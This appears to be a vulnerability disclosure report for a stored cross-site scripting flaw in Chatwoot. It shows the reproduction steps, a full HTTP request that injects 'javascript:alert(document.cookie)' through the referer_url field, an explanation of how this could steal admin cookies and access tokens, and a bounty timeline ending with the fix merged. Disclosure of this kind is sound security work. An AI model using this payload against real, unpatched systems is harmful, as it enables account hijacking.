Insecure Storage of Sensitive Information in chatwoot/chatwoot

Valid

Reported on

Feb 12th 2022


BUG

Stored xss via referer url allow to hijack victim access-token

STEP TO REPRODUCE

  1. From admin account goto https://app.chatwoot.com/app/accounts/42689/settings/inboxes/list and create a inbox of type website .
    Now get you configuration script from this inbox and save in html file .\

2. Now as a exeternal user view the above file and send a support chat messega while capturing it in burpsuite. Here bellow request is sent to server

POST /api/v1/widget/messages?website_token=6vsdbdaUQu21bnz3oFwhqQhW&locale=en HTTP/1.1
Host: app.chatwoot.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://app.chatwoot.com/widget?website_token=6vsdbdaUQu21bnz3oFwhqQhW
X-Auth-Token: eyJhbGciOiJIUzI1NiJ9.eyJzb3VyY2VfaWQiOiJlNDFhMWZiOC02MDk5LTQzZGQtOGUwYy0zMDRhODYzOTJmNGEiLCJpbmJveF9pZCI6MTEzNTZ9.cLoOIpAX0qWmbbLDVm3hCUb2DlmPJcwP9DJC-F8zSs8
Content-Type: application/json
Content-Length: 161
Origin: https://app.chatwoot.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"message":{"content":"xss via referer","timestamp":"Sat Feb 12 2022 21:56:37 GMT+0530 (India Standard Time)","referer_url":"javascript:alert(document.cookie)"}}

Here in this request i changed referer_url parameter value to javascript:alert(document.cookie) and forward the request .
Now a support message will be created .
3. Now from admin view the above chat message and CONTROL+CLick the referer link and see xss is executed

Video Poc

https://drive.google.com/file/d/1eQmGL0pvcaEcmRG_Tv0sA6-uznId7WYC/view?usp=sharing

IMPACT

I see chatwoot authenticate user using this header Access-Token,Token-Type,Client,Expiry,Uid .
And those value present in cookie auth_data .
So,using this xss cookie can be steal and also access token can be steal and using those token attacker can control victim acccount

We are processing your report and will contact the chatwoot team within 24 hours. 7 months ago
We have contacted a member of the chatwoot team and are waiting to hear back 7 months ago
We have sent a follow up to the chatwoot team. We will try again in 7 days. 7 months ago
We have sent a second follow up to the chatwoot team. We will try again in 10 days. 7 months ago
We have sent a third and final follow up to the chatwoot team. This report is now considered stale. 7 months ago
Sojan Jose validated this vulnerability 6 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the chatwoot team. We will try again in 7 days. 6 months ago
We have sent a second fix follow up to the chatwoot team. We will try again in 10 days. 6 months ago
We have sent a third and final fix follow up to the chatwoot team. This report is now considered stale. 6 months ago
Sojan Jose confirmed that a fix has been merged on 24b20c a month ago
The fix bounty has been dropped
endPoints.js#L7-L97 has been validated
base_controller.rb#L1-L110 has been validated
to join this conversation